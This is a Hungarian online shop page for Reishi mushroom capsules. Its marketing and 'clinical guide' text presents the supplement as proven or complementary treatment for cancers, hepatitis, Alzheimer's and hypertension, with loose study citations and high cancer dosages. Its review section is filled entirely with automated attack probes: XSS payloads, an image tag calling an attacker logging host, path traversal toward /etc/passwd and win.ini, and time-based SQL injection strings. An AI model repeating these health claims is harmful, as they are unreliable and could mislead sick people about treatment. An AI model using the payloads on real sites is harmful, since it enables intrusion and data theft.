kép

Reishi - Ganoderma lucidum


Ár: 6 290 Ft

Share

A Reishi az egyik legtöbb területen „bevethető”, igen „sokoldalú” gyógygomba. A gomba Ganoderma lucidum hatóanyaga alkalmas a rheumatoid arthritis kezelésére, de vizsgálatok bizonyították, hogy az asztmában vagy bronchitisben szenvedőknek is megoldást jelent. Immunerősítésre is kiváló, valamint fontos szerepet játszik a szív- és érrendszeri betegségek prevenciójában.
Japánban végzett kutatások szerint a Ganoderma Lucidum enyhíti a rákbetegek kezelése során alkalmazott sugárkezelés egészségkárosító hatásait, sőt támogatja a májsejtek optimális működését.
Továbbá több tanulmány is beszámolt arról, hogy a Ganoderma Lucidum gyógygomba kiegészítő kezelésként kulcsszerephez jut a modern rákgyógyító terápiákban. A szakirodalom szerint a prosztatarák, mellrák és a tüdőrák kezelésében kiegészítő terápiaként is bizonyított már a reishi, mivel csökkenti a tumorsejtek élettani folyamatait.

A reishi gyógygomba egy rendkívül nagy hatású növényi preparátum, ami a benne található összetevőknek - polyszacharidok, triterpének és szerves germánium – köszönhetően jelentősen erősíti a szervezet komplex immunrendszerét.
Öregedésünk folyamataink rendkívül szorosan összefüggést mutat immunrendszerünk állapotával és anyagcsere-folyamataink minőségével.
A szervezetünkben egyetlen másodperc alatt rengeteg élettani folyamat játszódik le, amelyben jelentős szerepet vállalnak az a különféle anyagok és enzimek. A reishi képes ösztönözni az enzimeken keresztül a szervezetünkben lejátszódó élettani folyamatok minőségét. Ez elsősorban olyan összetevőinek köszönhető, mint a polyszacharidok, triterpének, és a germánium. 

A triterpénekről érdemes tudni, hogy csökkentik a vérnyomást, valamint antiallergikus hatással rendelkeznek. A germánium nyomelem, jótékony hatást gyakorol a nehézfémek és más mérgező anyagok szervezetből való kiválasztására és javítja a sejtszintű oxigénellátást.


Összetevők: Ganoderma lucidum gomba kivonat, (poliszacharid, terpén), hidroxi-proril-metil-cellulóz
Hatóanyag 3db kapszulára vonatkoztatva: 
1200 mg Ganoderma lucidum gomba kivonat (30% poliszacharid, 3 % terpén) 
Adagolás: 2-6 kapszula/nap (A kapszulákat étkezés előtt vegye be!)

Alkalmazási területek:

tumoros megbetegedések
mellrák
allergia
inszomnia (alvászavar)
anti-aging
ízületi gyulladás (rheumatoid arthritis)
magas vérnyomás
májbetegségek

Pecsétviaszgomba: Klinikai útmutató (Martin Powell)

japán neve -  Reishi or Mannetake/ „a halhatalanság gombája”
kínai neve- Ling Zhi/ „ lélekerő gomba”, „lélek gomba”

Az egyik leghíresebb, legszélesebb hatásspektrummal rendelkező gyógygomba, amelyből a legtöbbet (2 milliárd $ ) adnak el Amerika szerte. Gyógyhatását a magas poliszacharid és a többféle triterpén (oxidatív és energia folyamatokban vesznek részt) tartalmának köszönheti. 

Gyógyhatásai
•    gátolja a hisztamin felszabadulását/ lefékezi az allergiás reakciókat
•    májvédő
•    vérnyomáscsökkentő (ACE inhibitor)
•    lassítja a koleszterin szintézist/ a magas koleszterinszintet csökkenti
•    gyulladáscsökkentő
•    vírusellenes/ gátolja a vírus gyors szaporodását
•    antioxidáns
•    tumor ellenes
•    nyugtató 
•    gombaölő
•    immunmoduláló (tumor- és vírusellenes)

Igen érdekes a lipidekben gazdag spórája is, melynek tumorgátló hatását bizonyítja számos in- vitro (testen kívüli) vizsgálat. Egy újabb összehasonlító tanulmány szerint a G.lucidum spóráinak őrleménye és a gomba termőtest kivonatának keverékének immunmoduláns és tumorellenes aktivitása hasonló volt a csupán spórákat tartalmazó őrleményének.

Rákos megbetegedések
A G.lucidum tradicionálisan is használatos a rákgyógyításban, a triterpenek ugyanis magas citotoxikus aktivitást mutattak számos tumor sejtvonalánál, meggátolva a rákos sejtek gyors növekedését, szaporodását és az áttétek kialakulását. Különösen hatékonynak bizonyult a hormon-független prosztata és a mellrák eseteiben (a tumorsejtek DNS-replikációjának gátlása révén). A tüdőrákos esetekben bekövetkezett javulás a G.lucidum poliszacharid kivonatának hatásaival (NK sejt aktiválása és a citokinek növelése) volt magyarázható.

Allergia
Mint immunmodulátor aktivitású gomba, a G.lucidum erős aktivitást mutatott az allergiás reakció-kaszkádok megfékezésében, valamint a gyulladásmediátorok (PGE2) gátlása révén gyulladáscsökkentő hatását is igazolták a vizsgálatok. A kínai vizsgálatok pedig bebizonyították, hogy a G.lucidum növényi kivonata megfékezte a mogyoró-allergiás egereknél a mogyorófogyasztás után hirtelen fellépő anafilaxiás shockot.

Bőrhalványítás
A G.lucidum vizes kivonata igen magas tirozináz gátlást mutatott, így ma már a legtöbb bőrhalványító és pigmentfolt-eltávolító kozmetológiai készítmény összetevői közt megtalálhatjuk.  

Májbetegségek
A májbetegek, de különösen a májfibrozis gyógyításánál a tradicionális távol-keleti gyógyítók körében mindig is nagy népszerűségnek örvendett a G.lucidum gombatörzs kivonata. Szintén régóta használatos a fertőző májgyulladás (B típusú) kezelésében is, mely hatását az a 355 pácienst számláló klinikai vizsgálat igazolta, amelyben a B típusú májgyulladásos betegek 92,4%-nál tapasztaltak pozitív eredményt a májenzimeket vizsgálva. A G.lucidum májvédő hatását a magas triterpén tatalmának köszönheti.

Magasvérnyomás, szív-érrendszer
 A Ganoderma lucidum több ponton is hat a keringési rendszerre. A kettős-vak, randomizált, multicentrikus vizsgálatok bebizonyították, hogy a vérzsír- (LDL, HDL), vérnyomáscsökkentő és az thrombusoldó hatása a G.lucidum poliszacharid és triterpén (szaponin) összetevőivel magyarázhatóak, míg az EKG-n tapasztalható pozitív változások, a szívdobogásérzet és a mellkasi fájdalom csökkenése a magas poliszacharid tartalomnak (Ganopoly) köszönhető. Ganoderma hatóanyagai között megtalálható oxigenizált szterolok gátolják a koleszterin szintézisét, ezáltal a koleszterinszintet csökkentik. Az enyhe vérnyomáscsökkentő (ACE-inhibítor) hatása pedig a Reishi gomba triterpénjének köszönhető. 

Álmatlanság/ szorongás
Nem hiába nevezték el „lélek gombának”, hisz a triterpének idegrendszerre kifejtett nyugtató hatása vitathatatlan, amelyben pedig nem szerénykedik a Ganoderma lucidum. Christopher Hobbs vizsgálatai szerint ajánlható álmatlanság ellen, míg Mizuno minden egyéb mentális eltérésnél javasolja, mint stabilizációs, regeneráló tényezőt. Sőt, gátolja az egyes idegrendszeri sejtsérüléseket (pl. gátolja a dopaminerg neuronok degenerációját, szétesését) - így véd a 
Parkinson kór kialakulása ellen is.

Reumás ízületi gyulladás (RA)
Egy in-vitro vizsgálat igazolta az immunmoduláló és gyulladáscsökkenő potenciállal rendelkező G.lucidum hatékonyságát az immuneredetű reumás ízületi gyulladásban. A gombakivonat hatékonyan gátolta a gyulladt porc szinoviális folyadékának felgyülemlését és a porc destrukcióját.

Anti-aging
Elfogadott tény, hogy a Ganoderma lucidum kivonata javítja az Alzheimeres betegek állapotát (gátolja a β-amyloid szinapszis toxicitását), valamint széles kardioprotektív, neuroprotektív hatásán kívüli a vércukor-és koleszterinszint szabályozó funkciója révén hozzájárul a szervezet egészséges egyensúlyi állapotához és a hosszú életévek megéléshez.


KLINIKAI ÖSSZESÍTŐ

Terápiás jelentősége:
Allergia, májvédelem, tumorellenes (mell- és prosztatarák), magasvérnyomás, szorongás, álmatlanság. Mindkét gombafajtára: Cordyceps sinenis, Ganoderma lucidum jellemző a tüdő- és májbetegségeknél tapasztalható gyógyító hatás.

Fő hatóanyagai: triterpének és poliszacharidok

Adagolása: 
Rákos elfajulások esetében 25-300g/ nap gombatörzs őrlemény vizes főzete. A kivonatok koncentrációs aránya igen változó (12-től 18:1-ig), de általában elfogadható a 15:1-es arány, amely megegyezik a 2-20g/nap kivonattal. A legtöbb szakember 3-6g/nap mennyiséget javasol, vagy szükség estén csak kisebb dózist ajánl 1-3g / nap.
A két hatóanyag (triterpének és a poliszacharidok) legnagyobb koncentrációban a gombatest kivonatában található meg, amelyet főzet (tea) formában érdemes elfogyasztania a betegeknek.  Igaz, hogy a poliszacharidok vízoldékonyak, így hatásuk jól érvényesül tea formájában, míg a triterpének sokkal jobban oldódnak az alkoholban, ezért a kereskedelemben alacsony alkohol tartalmú formában is forgalomba került a G. lucidum' kivona.

Figyelmeztetés: Óvatosan adagolható együtt vérnyomáscsökkentőkkel és nyugtató-szedatív hatású készítményekkel. Különösen óvatosan kell eljárni, ha a páciens véralvadásgátlókat szed! Ne használja a készítményeket terhesség és szoptatás ideje alatt. Használat előtt kérdezze meg kezelőorvosát, gyógyszerészét, valamint a következő esetekben: ha teherbeesést segítő készítményt szed, gyógyszert szed vagy orvosi kezelés alatt áll. Hosszú ideig tartó használatra nem javallott. Az étrend-kiegészítő nem helyettesíti a vegyes étrendet (és az egészséges életmódot)! Az ajánlott napi mennyiséget ne lépje túl!

A Reishi - Ganoderma lucidum (pecsétviaszgomba) támogatja az immunrendszer működését.

Összetevők: Ganoderma lucidum gomba kivonat, (poliszacharid, terpén), hidroxi-proril-metil-cellulóz

OÉTI:9811/2011

Kiszerelés: 60 db kapszula / doboz

Összetevők:
Ganoderma lucidum gomba kivonat, (poliszacharid, terpén), hidroxi-proril-metil-cellulóz

Hatóanyag 3db kapszulára vonatkoztatva: 

1200 mg Ganoderma lucidum gomba kivonat (30% poliszacharid, 3 % terpén) 

Adagolás: 2-6 kapszula/nap (A kapszulákat étkezés előtt vegye be!)

Csomagolási egység: A műanyag tégely 60db kapszulát tartalmaz

Figyelmeztetés: Ne használja a készítményeket terhesség és szoptatás ideje alatt. Használat előtt kérdezze meg kezelőorvosát, gyógyszerészét, valamint a következő esetekben: ha teherbeesést segítő készítményt szed, gyógyszert szed vagy orvosi kezelés alatt áll. Hosszú ideig tartó használatra nem javallott. Az étrend-kiegészítő nem helyettesíti a vegyes étrendet (és az egészséges életmódot)! Az ajánlott napi mennyiséget ne lépje túl!
Származási hely: Anglia

brdpmper 2020-08-15 17:33:04
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img sRc='http://attacker-9044/log.php?
brdpmper 2020-08-15 17:32:52
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<WP2PN4 x=9769>
brdpmper 2020-08-15 17:32:39
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ifRAme sRc=9441.com></IfRamE>
brdpmper 2020-08-15 17:32:26
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<W3JQVY>YONFI[!+!]</W3JQVY>
brdpmper 2020-08-15 17:32:10
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!ZPfQF <ScRiPt >UOGE(9532)</ScRiPt>
brdpmper 2020-08-15 17:31:55
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<% contenteditable onresize=UOGE(9188)>
ffpeavwl 2020-08-15 17:31:50
Értékelés:
WEB-INF\web.xml
ffpeavwl 2020-08-15 17:31:45
Értékelés:
WEB-INF/web.xml
brdpmper 2020-08-15 17:31:44
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!}body{acu:Expre/**/SSion(UOGE(9529))}
ffpeavwl 2020-08-15 17:31:38
Értékelés:
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
ffpeavwl 2020-08-15 17:31:33
Értékelés:
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
brdpmper 2020-08-15 17:31:28
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img<!-- --> src=x onerror=alert(9368);//><!-- -->
ffpeavwl 2020-08-15 17:31:26
Értékelés:
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
ffpeavwl 2020-08-15 17:31:23
Értékelés:
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
ffpeavwl 2020-08-15 17:31:18
Értékelés:
..\..\..\..\..\..\..\..\windows\win.ini
brdpmper 2020-08-15 17:31:17
Értékelés:
[url=http://www.vulnweb.com][/url]
ffpeavwl 2020-08-15 17:31:13
Értékelés:
................windowswin.ini
ffpeavwl 2020-08-15 17:31:10
Értékelés:
brdpmper 2020-08-15 17:31:07
Értékelés:
<a HrEF=jaVaScRiPT:>
ffpeavwl 2020-08-15 17:31:00
Értékelés:
../../../../../../../../../../windows/win.ini.jpg
ffpeavwl 2020-08-15 17:30:56
Értékelés:
C:\WINDOWS\system32\drivers\etc\hosts
brdpmper 2020-08-15 17:30:48
Értékelés:
<a HrEF=http://www.vulnweb.com></a>
ffpeavwl 2020-08-15 17:30:44
Értékelés:
../../../../../../../../../../windows/win.ini
ffpeavwl 2020-08-15 17:30:41
Értékelés:
WEB-INF\web.xml
ffpeavwl 2020-08-15 17:30:34
Értékelés:
/WEB-INF/web.xml
brdpmper 2020-08-15 17:30:30
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<input autofocus onfocus=UOGE(9276)>
ffpeavwl 2020-08-15 17:30:27
Értékelés:
WEB-INF/web.xml
ffpeavwl 2020-08-15 17:30:23
Értékelés:
/\../\../\../\../\../\../\../etc/passwd
ffpeavwl 2020-08-15 17:30:16
Értékelés:
file:///etc/passwd
brdpmper 2020-08-15 17:30:12
Értékelés:
ffpeavwl 2020-08-15 17:30:07
Értékelés:
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
ffpeavwl 2020-08-15 17:30:01
Értékelés:
..
brdpmper 2020-08-15 17:29:59
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!&lt;ScRiPt&gt;UOGE(9684)&lt;/sCripT&gt;
ffpeavwl 2020-08-15 17:29:58
Értékelés:
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
ffpeavwl 2020-08-15 17:29:54
Értékelés:
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
brdpmper 2020-08-15 17:29:52
Értékelés:
Írj véleményt a termékről!\u003CScRiPt\UOGE(9444)\u003C/sCripT\u003E
ffpeavwl 2020-08-15 17:29:50
Értékelés:
/.././.././.././.././.././.././.././../etc/./passwd%00
ffpeavwl 2020-08-15 17:29:47
Értékelés:
%2fetc%2fpasswd
ffpeavwl 2020-08-15 17:29:45
Értékelés:
/etc/passwd
brdpmper 2020-08-15 17:29:44
Értékelés:
%25%63%33%25%38%64%72%6A%25%32%30%76%25%63%33%25%61%39%6C%65%6D%25%63%33%25%61%39%6E%79%74%25%32%30%61%25%32%30%74%65%72%6D%25%63%33%25%61%39%6B%72%25%63%35%25%39%31%6C%21%3C%53%63%52%69%50%74%20%3E%55%4F%47%45%289717%29%3C%2F%73%43%72%69%70%54%3E
ffpeavwl 2020-08-15 17:29:41
Értékelés:
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
ffpeavwl 2020-08-15 17:29:38
Értékelés:
/../..//../..//../..//../..//../..//etc/passwd.jpg
ffpeavwl 2020-08-15 17:29:36
Értékelés:
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
brdpmper 2020-08-15 17:29:36
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img/src=">" onerror=alert(9679)>
ffpeavwl 2020-08-15 17:29:34
Értékelés:
../../../../../../../../../../etc/passwd.jpg
ffpeavwl 2020-08-15 17:29:31
Értékelés:
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
brdpmper 2020-08-15 17:29:30
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img src=xyz OnErRor=UOGE(9046)>
ffpeavwl 2020-08-15 17:29:28
Értékelés:
../../../../../../../../../../../../../../../proc/version
ffpeavwl 2020-08-15 17:29:25
Értékelés:
../../../../../../../../../../etc/passwd
brdpmper 2020-08-15 17:29:18
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img src=//testasp.vulnweb.com/t/dot.gif onload=UOGE(9879)>
brdpmper 2020-08-15 17:29:12
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<body onload=UOGE(9146)>
brdpmper 2020-08-15 17:29:06
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9129'>
brdpmper 2020-08-15 17:28:59
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<isindex type=image src=1 onerror=UOGE(9164)>
brdpmper 2020-08-15 17:28:51
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<svg
brdpmper 2020-08-15 17:28:42
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<video><source onerror="javascript:UOGE(9157)">
brdpmper 2020-08-15 17:28:32
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >UOGE(9193)</ScRiPt>
brdpmper 2020-08-15 17:28:23
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9450></ScRiPt>
brdpmper 2020-08-15 17:28:13
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >UOGE(9396)</ScRiPt>
brdpmper 2020-08-15 17:28:05
Értékelés:
Írj véleményt a termékről!<ScR<ScRiPt>IpT>UOGE(9335)</sCr<ScRiPt>IpT>
brdpmper 2020-08-15 17:27:55
Értékelés:
Írj véleményt a termékről!<script>UOGE(9179)</script>
brdpmper 2020-08-15 17:27:45
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<WY1IRL>5SORN[!+!]</WY1IRL>
brdpmper 2020-08-15 17:27:38
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >UOGE(9493)</ScRiPt>
qqmwmacm 2020-08-15 17:27:36
Értékelés:
955'
qqmwmacm 2020-08-15 17:27:34
Értékelés:
gThut5Yp'));select pg_sleep(9.459); --
qqmwmacm 2020-08-15 17:27:32
Értékelés:
r029auUo');select pg_sleep(6.306); --
brdpmper 2020-08-15 17:27:32
Értékelés:
{{10000288*9999815}}
qqmwmacm 2020-08-15 17:27:30
Értékelés:
kRnxnohM';select pg_sleep(6.306); --
qqmwmacm 2020-08-15 17:27:28
Értékelés:
x9D566f0'; waitfor delay '0:0:6.306' --
brdpmper 2020-08-15 17:27:27
Értékelés:
CWS000x
qqmwmacm 2020-08-15 17:27:26
Értékelés:
1 waitfor delay '0:0:6.306' --
qqmwmacm 2020-08-15 17:27:23
Értékelés:
(select(0)from(select(sleep(6.306)))v)/*'+(select(0)from(select(sleep(6.306)))v)+'"+(select(0)from(select(sleep(6.306)))v)+"*/
qqmwmacm 2020-08-15 17:27:20
Értékelés:
if(now()=sysdate(),sleep(3.153),0)/*'XOR(if(now()=sysdate(),sleep(3.153),0))OR'"XOR(if(now()=sysdate(),sleep(3.153),0))OR"*/
qqmwmacm 2020-08-15 17:27:18
Értékelés:
